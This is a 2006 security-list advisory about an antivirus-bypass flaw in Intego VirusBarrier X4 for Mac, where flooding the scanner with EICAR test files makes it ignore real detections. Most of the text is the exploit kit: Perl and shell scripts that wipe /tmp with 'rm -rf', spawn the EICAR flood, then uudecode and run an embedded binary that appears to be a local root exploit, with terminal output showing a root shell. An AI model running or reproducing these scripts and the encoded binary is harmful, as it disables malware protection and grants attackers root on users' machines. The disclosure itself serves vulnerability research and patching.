[NEWS] Intego VirusBarrier X4 Definition Bypass (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Intego VirusBarrier X4 Definition Bypass (Exploit)
------------------------------------------------------------------------


SUMMARY

Intego VirusBarrier X4 is "the simple, fast and non-intrusive antivirus
security solution for Macintosh computers, by Intego, the leading
publisher of personal security software for Macintosh. It offers thorough
protection against viruses of all types, coming from infected files or
applications, whether on CD-ROMs, DVDs or other removable media, or on
files downloaded over the Internet or other types of networks".

Although VirusBarrier does a pretty good job of halting malicous activity
the product currently suffers from a flaw related to the amount of alerts
that it can process simultaneously. If an attacker is able to trigger
multiple alerts in succession within a very short amount of time he or she
may be able cause VirusBarrier to completely ignore positive matches
against virus definitions. The consequences of ignored matches may include
full system compromise or further spreading of malware.

DETAILS

As an example we will show how VirusBarrier normally stops a local root
exploit with behavior similar to 'OSX.ExploitMachex.A', then we will
demonstrate how the VirusBarrier protection can be bypassed by using a
simple flood of Eicar Test files.

Any typical attempt to access or execute a file or program that is a match
for a VirusBarrier definition results in an alert on the user interface.
There is a sweet lookin insulin bottle on the screen that slowly empties
as the virus nears eradication.

'excploit' is infected by 'OSX.ExploitMachex.A' What would you like to do
('Ignore' || 'Repair')?

Selecting 'Ignore' allows the malicious code to execute as if no AntiVirus
program existed at all.

virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm),
79(appserverusr), 80(admin)

On the other hand if you chose 'Repair' the process is terminated dead in
its tracks and the file is nulled out:

virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit
-bash: ./excploit: Operation not permitted
virusbarrier-users-ibook:/tmp virusbarrieruser$ ls -al excploit
-rwxr-xr-x 1 virusbar wheel 0 Oct 31 02:02 excploit

The above output demonstrates how Virusbarrier is supposed to work. Under
normal circumstances this would be adequate to stop a
malicious attack.

If however an attacker floods the file system with dummy virus files at a
quick rate the VirusBarrier software will promptly stop responding after
presenting the user with a few audible and visual alerts. After about 40
some odd infected files in a row the system will become confused and in
some cases VirusBarrier may stop responding completely. (Intego confirmed
a limit of 20 files)

When under attack the user may see dozens of messages on the screen. With
our example code the messages are similar to the following:

'0.92815455662033' is infected by 'EICAR Test' What would you like to do ?

From the attackers standpoint the exploitation is fairly quick and simple.
Our example uses a local root exploit however this tactic could easily be
applied to any existing malware technique that Intego VirusBarrier
protects against. Code could in theory be run as a precursor to an InqTana
attack as a means to bypass the Intego protection. The existing signatures
for InqTana A B C and D would then be completely useless and an E variant
would be born.

virusbarrier-users-ibook:~ virusbarrieruser$ cd ~/Desktop/pwntego
virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ls
Pwntego.pl Pwntego.sh README.txt pwntego.uu
rand-eicar.pl
virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ./Pwntego.pl
rm: /tmp/objc_sharing_ppc_92: Permission denied
;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p; P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P
;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;
P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p
;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p
Injecting pwnacillin shot
;p;P;p;p;p;P;p;p;p;P;p;puid=0(root) gid=0(wheel) groups=0(wheel),
81(appserveradm), 79(appserverusr), 80(admin)
rm: /tmp/objc_sharing_ppc_92: Permission denied

In the above example 'OSX.ExploitMachex.A' is being executed on a machine
that is actively protected by VirusBarrier. In a matter of seconds the
Intego engine is flooded and the attacker has the ability to completely
ignore any Intego virus and malware definitions.

One fun side effect of this attack is that the user must manually ignore a
number of alerts. The users is either forced to Wait for each alert to
timeout on its own after several seconds or respond individually to each
one.

This attack has a fairly obvious signature in syslog if the attacker is
making use of the example code provided in this text. Obviously using
random viruses and better random locations and names is a possible vector
for a crafty attacker.

virusbarrier-users-ibook:/var/log root# tail -n 30 /var/log/vbmgvx.log
Tue Oct 31 02:01:59 2006 - File infected: /private/tmp/excploit by
OSX.ExploitMachex.A
Tue Oct 31 02:03:35 2006 - File infected: /private/tmp/0.928154556620033
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.61298609695314 by
EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.162308515588851
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.0414842034961147
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.170612903152691
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.663680631042556
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.989461917736666
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.141391639438556
by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.767640548831881
by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.33160483146003 by
EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.905278172650473
by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.694262116056965
by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.659224330986948
by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.0702005096982283
by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.708270066600888
by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.59629Vixen08698
by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.56121Nixen47099
by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.56036Rocks!6377
by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.184830066600818
by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.783363853189261
by EICAR Test

With the current fixes in place once VirusBarrier gets 19 alerts, the next
malware is simply quarantined until the administrator can repair them. In
our example, the additional processes get a permission error when they are
executed.

Of course since everyone knows there is no malware for Macintosh this
scenario would quite simply never be encountered..... *smirk*

The Intego staff was more than helpful and willing to address this issue
in a timely fashion. After communications were established this problem
was addressed, and fixes were out the door to customers in a matter of 2
days. How about that for turn around time!

Workaround:
Please update to the latest version of Intego Virus Barrier and the latest
Vdefs: <http://www.intego.com/services/updates.asp?product=VirusBarrier>
http://www.intego.com/services/updates.asp?product=VirusBarrier

Intego has fixed this bug in the 2006/11/01 Vdef files.

Exploits:
Pwntego.pl
#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# If you are lucky this *may* bring VirusBarrier to 100% CPU usage also.
# It sounds like my mac mini is gonna fucking launch off my desk. heh!
system("rm -rf /tmp/* > /dev/null");
for($i =0; $i <= 40; $i=$i+1) # Is 40 the magic virus limit for Intego??
{
system("./rand-eicar.pl&");
# sleep 1;
}
printf("\n");
printf("Injecting pwnacillin shot\n");
system("uudecode pwntego.uu;chmod +x pwntego; rm -rf /tmp/sh; cp -rf
/usr/bin/id /tmp/sh; ./pwntego");
system("rm -rf /tmp/* > /dev/null");

Pwntego.sh
#!/bin/sh
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
rm -rf /tmp/*
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
/rand-eicar.pl &
uudecode pwntego.uu
chmod +x pwntego
rm -rf /tmp/sh
cp -rf /usr/bin/id /tmp/sh
/pwntego
rm -rf /tmp/*

pwntego.uu
begin 644 pwntego
M_NWZS@```!(``````````@````H```5$````A0````$````X7U]004=%6D52
M3P```````````````!`````````````````````````````````$`````0``
M`8Q?7U1%6%0````````````````0````$``````````0``````<````%````
M!0````!?7W1E>'0`````````````7U]415A4````````````````%K0```7X
M```&M`````(``````````(``!````````````%]?<&EC<WEM8F]L7W-T=6)?
M7U1%6%0````````````````<K`````````RL`````@``````````@```"```
M```````D7U]S>6UB;VQ?<W1U8@```%]?5$585````````````````!RL````
M````#*P````"``````````"````(`````````!1?7W!I8W-Y;6)O;'-T=6(Q
M7U]415A4````````````````'*P```*@```,K`````(``````````(``!`@`
M````````(%]?8W-T<FEN9P````````!?7U1%6%0````````````````?3```
M`+0```],`````@```````````````@```````````````0```=!?7T1!5$$`
M```````````````@````$````!`````0``````<````#````!@````!?7V1A
M=&$`````````````7U]$051!````````````````(`````"@```0``````(`
M`````````````````````````%]?;&%?<WEM8F]L7W!T<@!?7T1!5$$`````
M```````````@H````%0``!"@`````@``````````````!P```!4`````7U]N
M;%]S>6UB;VQ?<'1R`%]?1$%400```````````````"#T````&```$/0````"
M```````````````&````*@````!?7V1Y;&0`````````````7U]$051!````
M````````````(0P````<```1#`````(``````````````````````````%]?
M8G-S``````````````!?7T1!5$$````````````````A*````!``````````
M`P```````````````0``````````7U]C;VUM;VX``````````%]?1$%400``
M`````````````"%`````.``````````$```````````````!````````````
M```!````.%]?3$E.2T5$250``````````#`````0````(`````[8````!P``
M``$`````````!`````X````<````#"]U<W(O;&EB+V1Y;&0````````,````
M-````!A%(8IM`$<!!``!```O=7-R+VQI8B]L:6)3>7-T96TN0BYD>6QI8@``
M`````@```!@``"``````A@``)W0```=D````"P```%``````````5````%0`
M```7````:P```!L``````````````````````````````````":T````,```
M```````````````````````6````$```)D@````;````!0```+`````!````
M*```%K0`````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````?#H+>#@A__Q4(0`T.````)`!``"4(?_`@'H``#B:``0[8P`!5WL0
M.GRDVA1(```)?^``"'P(`J:_@?_PD`$`")0A_Z!"GP`%?^@"IGQ\&WA\G2-X
M?+XK>$@``;$\7P``DX()!#Q?``"3H@D(/%\``)/""0P\7P``@$(*`(&"```O
MC```0;X`#'V)`Z9.@`0A/%\``(!""?R!@@``+XP``$&^``Q]B0.F3H`$(4@`
M!8T\7P``@8()&(`,```O@```0;X`#'V)`Z9.@`0A2```]3Q?``"!@@D4@`P`
M`"^```!!O@`,?8D#IDZ`!"$\?P``.&,(5#B!`$!(``%E@&$`0"^#``!!O@`(
M2``%$3@````\7P``@$()^)`"``"!/0``?2)+>"^)``!!G@!D.4```#E@``"(
M"0``?``'="^```!!G@`P?`)8KGP`!W0O@``O0+X`"'U+$A0Y:P`!?2)+>'P)
M6*Y\``=T+X```$">_]@OB@``09X`##@*``%(```(@!T``#Q?``"0`@D0?\;S
M>(`>```O@```09X`$(0&``0O@```0)[_^'^#XWA_I.MX?\7S>#C&``1(``+5
M2``$/7P(`J:3X?_\D`$`")0A_Z!"GP`%?^@"ICQ_```X8P;@.($`0$@``'F!
M@0!`?8D#IDZ`!"&``0!H."$`8'P(`Z:#X?_\3H``(#U@``"!:R$,+(L``$&&
M``A.@``@.*``3CB```!@A!^8.&```C@```1$```".&``.S@```%$```"?^``
M"#V```"`#"$,?`D#ICV```!AC!``3H`$(#U@``"!:R$0?6D#IDZ`!"!\"`*F
MOZ'_])`!``B4(?^@?#X+>)!^`'B0G@!\.&```3B``"A(``2I?&`;>)`>`$"`
M7@!`@!X`>)`"``2`7@!`@!X`?)`"``B`7@!`.```*)`"``"#O@!`.&`!+4@`
M!%&0?0`0.&`!+8">`$!(``0A@"$``(`!``A\"`.FNZ'_]$Z``"!\"`*FO\'_
M^)`!``B4(?^@?#X+>)!^`'B0G@!\.````)`>`$@X8`$M2``$`9!^`$`X'@!`
MD!X`1(!>`$2``@``+X```$">``A(``!X@%X`1(!"``"`0@`$@!X`>'^"``!`
MG@!,@%X`1(!"``"`0@`(@!X`?'^"``!`G@`T@%X`1(`"``"0'@!(@3X`1(!>
M`$B``@`0D`D``(!>`$B``@``+X``*$&>`!Q(``-!@%X`1(!"```X`@`0D!X`
M1$O__WPX8`$M@)X`0$@``T&`'@!(+X```$&>`#2`7@!(@`(`#"^```!!G@`<
M@%X`2(`"``R`?@!(?`P#>'V)`Z9.@`0A@'X`2$@``L6`(0``@`$`"'P(`Z:[
MP?_X3H``('P(`J:_P?_XD`$`")0A_Z!\/@MX0I\`!7_H`J9(``)Q/%\``(!"
M!BB``@`(D!X`0(`>`$`O@```09X`'(!>`$"@`@`$5``$/BN```)`G0`(2```
M'#Q?``"`8@5$2``"$3Q?``"`8@5`2``!Y8`A``"``0`(?`@#IKO!__A.@``@
M?`@"IK_!__B0`0`(E"'_H'P^"WA"GP`%?^@"ICQ?``"`0@6P@`(``)`>`$`X
M'@!$@'X`0#B```%\!0-X2``#L8!^`$"`G@!$@+X`1#C``!1(``-]@'X`0#B`
M``*`O@!$.,```SC@``%(``-%2``#(7Q@&W@O@```09X`*#Q?``"`8@6L.(`"
M`("^`$0XP```2``"W3A@``!(``*U2```+#A@``,\GP``.(0%T$@``H$\?P``
M.&,$D#R?```XA`2@.*```$@``DDX````?`,#>(`A``"``0`(?`@#IKO!__A.
M@``@?`@"IK_!__B0`0`(E"'_L'P^"WA"GP`%?^@"II!^`&B0G@!LD+X`<)#>
M`'20_@!XD1X`?)$^`("17@"$@'X`<(">`(PXH`"`.,```4@``;V`7@",@'X`
M<(""```\OP``.*4#Y#C``(!(``&!.````'P#`WB`(0``@`$`"'P(`Z:[P?_X
M3H``('P(`J9"GP`%?6@"ICUK``!\"`.FA8L#['V)`Z9.@`0@?`@"ID*?``5]
M:`*F/6L``'P(`Z:%BP/0?8D#IDZ`!"!\"`*F0I\`!7UH`J8]:P``?`@#IH6+
M`[1]B0.F3H`$('P(`J9"GP`%?6@"ICUK``!\"`.FA8L#F'V)`Z9.@`0@?`@"
MID*?``5]:`*F/6L``'P(`Z:%BP-\?8D#IDZ`!"!\"`*F0I\`!7UH`J8]:P``
M?`@#IH6+`V!]B0.F3H`$('P(`J9"GP`%?6@"ICUK``!\"`.FA8L#1'V)`Z9.
M@`0@?`@"ID*?``5]:`*F/6L``'P(`Z:%BP,H?8D#IDZ`!"!\"`*F0I\`!7UH
M`J8]:P``?`@#IH6+`PQ]B0.F3H`$('P(`J9"GP`%?6@"ICUK``!\"`.FA8L"
M\'V)`Z9.@`0@?`@"ID*?``5]:`*F/6L``'P(`Z:%BP+4?8D#IDZ`!"!\"`*F
M0I\`!7UH`J8]:P``?`@#IH6+`KA]B0.F3H`$('P(`J9"GP`%?6@"ICUK``!\
M"`.FA8L"G'V)`Z9.@`0@?`@"ID*?``5]:`*F/6L``'P(`Z:%BP*`?8D#IDZ`
M!"!\"`*F0I\`!7UH`J8]:P``?`@#IH6+`F1]B0.F3H`$('P(`J9"GP`%?6@"
MICUK``!\"`.FA8L"2'V)`Z9.@`0@?`@"ID*?``5]:`*F/6L``'P(`Z:%BP(L
M?8D#IDZ`!"!\"`*F0I\`!7UH`J8]:P``?`@#IH6+`A!]B0.F3H`$('P(`J9"
MGP`%?6@"ICUK``!\"`.FA8L!]'V)`Z9.@`0@?`@"ID*?``5]:`*F/6L``'P(
M`Z:%BP'8?8D#IDZ`!"!\"`*F0I\`!7UH`J8]:P``?`@#IH6+`;Q]B0.F3H`$
M(`````!?7V1Y;&1?;6]D7W1E<FU?9G5N8W,```!?7V1Y;&1?;6%K95]D96QA
M>65D7VUO9'5L95]I;FET:6%L:7IE<E]C86QL<P````!4:&4@:V5R;F5L('-U
M<'!O<G0@9F]R('1H92!D>6YA;6EC(&QI;FME<B!I<R!N;W0@<')E<V5N="!T
M;R!R=6X@=&AI<R!P<F]G<F%M+@H``"]U<W(O8FEN+V-H<V@```!C:'-H````
M````````````````````'TP``"%$```:P```&:0``!D@2```%0``````$```
M```````0``!\J`*F.&```SB%```X``##1````F`````X8```.```%T0```)@
M````.&```#@``+5$```"8````#AE`&@XA0!TD&0``#@``#M$```"8````#@`
M``%$```"+R\O+W1M<"]S:````````````````!CX```8^```&/@``!CX```8
M^```&/@``!CX```8^```&/@``!CX```8^```&/@``!CX```8^```&/@``!CX
M```8^```&/@``!CX```8^```&/@`````````````````````````````````
M````````````````````````````&/@`````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````0:9`$`````%K0```0B@`````````````1$@`````````````169`$`
M````%N@```179`$`````%N@```1P9`$`````%N@```2./`````````````2=
M#@8`````(!````2R#@8`````(!0`````1`$`L@``%N@`````1`$`O0``%PP`
M````1`$`P```%Q``````1`$`P0``%Q@`````1`$`P@``%R``````1`$`Q```
M%R@`````1`$`Q0``%SP`````1`$`Q@``%T0`````1`$`QP``%U@`````1`$`
MR@``%V``````1`$`SP``%V0`````1`$`T```%W@`````1`$`V0``%X``````
M1`$`W0``%X0`````1`$`W@``%Y@`````1`$`ZP``%Z``````1`$`[```%[``
M````1`$`[0``%[P`````1`$`\```%\``````1`$`\@``%]``````1`$`\P``
M%^``````1`$`]```%^0`````1`$`]0``%_@`````1`$`]@``&`@`````1`$`
M]```&`P`````1`$`^```&"0`````1`$`^0``&"P`````1`$`^P``&#0`````
M1`$!!@``&$``````1`$!"P``&%P`````1`$!#```&'0```3B)`$`L@``%N@`
M``3V@`````````````4"0```KP```!P```4M0```L````!T```550```L0``
M`!X```5A@`````````````5L@`````````````5X0```LP````L```6!0```
MM`````H```6*0```M@````8```63@```N0```$````6LP`$`````%PP```6M
MX`$`````&'0```6N)````````8P```6O#@$`````&'0`````1`$!)@``&'0`
M````1`$!*0``&(P`````1`$!*P``&)P`````1`$!+```&*@```7%)`$!)@``
M&'0```7A@``!)P```$````7IP`$`````&(P```7JX`$`````&+P```7K)```
M`````$@```7L(```+0````````7Z(```+@````````8((```+P````````87
M(```,`````````8I(```;@````````90(```;P````````9M)@8`=0``(!``
M``:()@8`>@``(!0```:^9`$`````&+P```:_#@D`````(0P```;D#@4`````
M'Y@```;R#@D`````(1`````@'@$`````&1`````S'@$`````&+P```!%'@$`
M````%N@```!6'@$`````&/@```<+#@$`````&2````<N#@$`````&:0```=4
M#@H`````(2@```=:#@8`````("`````$#P8`$```(``````,#P8`$```(`0`
M``!U#P$`````&L`````4#P8`$```(`P```"^#PL`````(4````#B`P``$```
M$`````#V#PL`````(40```$)#PL`$```(4@```$@#PL`$```(4P```$]#P$`
M$```'"0```%C#PL`$```(5````%V#PL`$```(50```&0#PL`$```(5@```&K
M#PL`$```(5P```'(#PL`$```(6````'B#PL`$```(60```(##PL`$```(6@`
M``(E#PL`$```(6P```))#PL`$```(7````!-#P8`$```(`@```**#P$`````
M&T````*0#PL`$```(70```!O#P$`````%K0```";`0`!`0````````*A`0`!
M``````````#+`0`!``````````*R`0`!`0````````+5`0`!`0````````+[
M`0`!`0````````,)`0`!`0````````,O`0`!`0````````-7`0`!`0``````
M``$!`0`!`0````````->`0`!`0````````)J`0`!``````````-L`0`!````
M``````-X`0`!`0````````)Q`0`!`0````````-_`0`!`0````````-F`0`!
M`0````````)W`0`!``````````.%`0`!`0````````.;`0`!`0````````.O
M`0`!`0````````/'`0`!``````````/8`0`!`0````````/C`0`!`0``````
M``/]`0`!`0````````0*`0`!`0````````04`0`!`0````````%?```!8```
M`>,```((```""@```A@```(:```"'@```R<```-N```#J```!*,```2N```$
MM```!+H```4,```%'```!Q<```<C```'*@``!S@```=(```)MP``"M````M3
M```+;@``"YP```!Y````=````&L```!O````;@```'````![````<P```'(`
M``!Q````=0```(0```"#````>````($```"%````?0```'H```""````?P``
M`'X```!Y````=````&L```!O````;@```'````![````<P```'(```!Q````
M=0```(0```"#````>````($```"%````?0```'H```""````?P```'X```!V
M````;0```'P```!L````=P```(``````7TY807)G8P!?3EA!<F=V`%]?7W!R
M;V=N86UE`%]?9'EL9%]F=6YC7VQO;VMU<`!?7V1Y;&1?:6YI=%]C:&5C:P!?
M7W-T87)T`%]E;G9I<F]N`&1Y;&1?<W1U8E]B:6YD:6YG7VAE;'!E<@!S=&%R
M=`!?7U]D87)W:6Y?9V-C,U]P<F5R96=I<W1E<E]F<F%M95]I;F9O`%]?7VME
M>6UG<E]D=V%R9C)?<F5G:7-T97)?<V5C=&EO;G,`7U]C<&QU<U]I;FET`%]?
M8W1H<F5A9%]I;FET7W)O=71I;F4`7U]M:%]E>&5C=71E7VAE861E<@!?7V]B
M:F-);FET`%]A=&5X:70`7V-A=&-H7V5X8V5P=&EO;E]R86ES90!?8V%T8VA?
M97AC97!T:6]N7W)A:7-E7W-T871E`%]C871C:%]E>&-E<'1I;VY?<F%I<V5?
M<W1A=&5?:61E;G1I='D`7V-L;V-K7V%L87)M7W)E<&QY`%]D;U]M86-H7VYO
M=&EF>5]D96%D7VYA;64`7V1O7VUA8VA?;F]T:69Y7VYO7W-E;F1E<G,`7V1O
M7VUA8VA?;F]T:69Y7W!O<G1?9&5L971E9`!?9&]?;6%C:%]N;W1I9GE?<V5N
M9%]O;F-E`%]D;U]S97%N;W-?;6%C:%]N;W1I9GE?9&5A9%]N86UE`%]D;U]S
M97%N;W-?;6%C:%]N;W1I9GE?;F]?<V5N9&5R<P!?9&]?<V5Q;F]S7VUA8VA?
M;F]T:69Y7W!O<G1?9&5L971E9`!?9&]?<V5Q;F]S7VUA8VA?;F]T:69Y7W-E
M;F1?;VYC90!?97)R;F\`7V5X:70`7VUA8VA?:6YI=%]R;W5T:6YE`%]M86EN
M`%]R96-E:79E7W-A;7!L97,`7U]?:V5Y;6=R7V=L;V)A;`!?7V1Y;&1?<F5G
M:7-T97)?9G5N8U]F;W)?861D7VEM86=E`%]?9'EL9%]R96=I<W1E<E]F=6YC
M7V9O<E]R96UO=F5?:6UA9V4`7U]I;FET7VME>6UG<@!?7VME>6UG<E]G971?
M86YD7VQO8VM?<')O8V5S<W=I9&5?<'1R`%]?:V5Y;6=R7W-E=%]A;F1?=6YL
M;V-K7W!R;V-E<W-W:61E7W!T<@!?86)O<G0`7V-A;&QO8P!?9G)E90!?97AC
M7W-E<G9E<@!?97AE8VP`7V9O<FL`7VUA8VA?;7-G7W-E<G9E<E]O;F-E`%]M
M86-H7W!O<G1?86QL;V-A=&4`7VUA8VA?<&]R=%]I;G-E<G1?<FEG:'0`7VUA
M8VA?=&%S:U]S96QF7P!?<V5T<FQI;6ET`%]T87-K7W-E=%]E>&-E<'1I;VY?
M<&]R=',`7W9M7V%L;&]C871E`%]V;5]W<FET90!?=V%I=`!S=&%R="YS`&EN
M=#IT,3UR,3LM,C$T-S0X,S8T.#LR,30W-#@S-C0W.P!C:&%R.G0R/7(R.S`[
M,3(W.P``+U-O=7)C94-A8VAE+T-S=2]#<W4M-#8O`"]3;W5R8V5#86-H92]#
M<W4O0W-U+30V+V-R="YC`&=C8S)?8V]M<&EL960N`%]P;VEN=&5R7W1O7V]B
M:F-);FET`%]P;VEN=&5R7W1O7U]D87)W:6Y?9V-C,U]P<F5R96=I<W1E<E]F
M<F%M95]I;F9O`%]S=&%R=#I&*#`L,2D]*#`L,2D`=F]I9#IT*#`L,2D`87)G
M8SI0*#`L,BD]<B@P+#(I.RTR,30W-#@S-C0X.S(Q-#<T.#,V-#<[`&%R9W8Z
M4"@P+#,I/2HH,"PT*3TJ*#`L-2D]<B@P+#4I.S`[,3(W.P!E;G9P.E`H,"PS
M*0!I;G0Z="@P+#(I`&-H87(Z="@P+#4I`&DZ<B@P+#(I`'`Z<B@P+#0I`'$Z
M<B@P+#,I`'1E<FTZ*#`L-BD]*B@P+#<I/68H,"PQ*0````!?7V-A;&Q?;6]D
M7VEN:71?9G5N8W,`7V-A;&Q?;6]D7VEN:71?9G5N8W,Z9B@P+#$I`'`Z*#`L
M-BD`````3EA!<F=C.D<H,"PR*0!.6$%R9W8Z1R@P+#,I`&5N=FER;VXZ1R@P
M+#,I`%]?<')O9VYA;64Z1R@P+#0I`&UA8VA?:6YI=%]R;W5T:6YE.D<H,"PX
M*3TJ*#`L.2D]9B@P+#(I`%]C=&AR96%D7VEN:71?<F]U=&EN93I'*#`L."D`
M<&]I;G1E<E]T;U]O8FIC26YI=#I3*#`L-BD`<&]I;G1E<E]T;U]?9&%R=VEN
M7V=C8S-?<')E<F5G:7-T97)?9G)A;65?:6YF;SI3*#`L-BD``&1Y;&1?;&%Z
M>5]S>6UB;VQ?8FEN9&EN9U]E;G1R>5]P;VEN=`!E<G)O<E]M97-S86=E`&1Y
M;&1?9G5N8U]L;V]K=7!?<&]I;G1E<@!?9&%R=VEN7W5N=VEN9%]D>6QD7V%D
M9%]I;6%G95]H;V]K`%]D87)W:6Y?=6YW:6YD7V1Y;&1?<F5M;W9E7VEM86=E
67VAO;VL`7W)L+C``7VEM<&QA;G0`````
`
end

rand-eicar.pl
#!/usr/bin/perl
#
# http://www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
$test = rand($i);
open(OP,">/tmp/$test");
# Uh... this isn't eicar dumb ***... I should not have to break this line
up.
printf OP "X5O!P" . "%@AP\[" . "4\PZX" . "54(P^)" . "7CC)7\}" . "\$EICAR"
"-STANDARD-ANTIVIRUS-TEST-FILE" . "!$H+H*";
print(";p;P;p;p");


ADDITIONAL INFORMATION

The information has been provided by
<mailto:kf_lists@xxxxxxxxxxxxxxxxxxx> K F.
The original article can be found at:
<http://www.digitalmunition.com/DMA[2006-1031a].txt>
http://www.digitalmunition.com/DMA[2006-1031a].txt



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

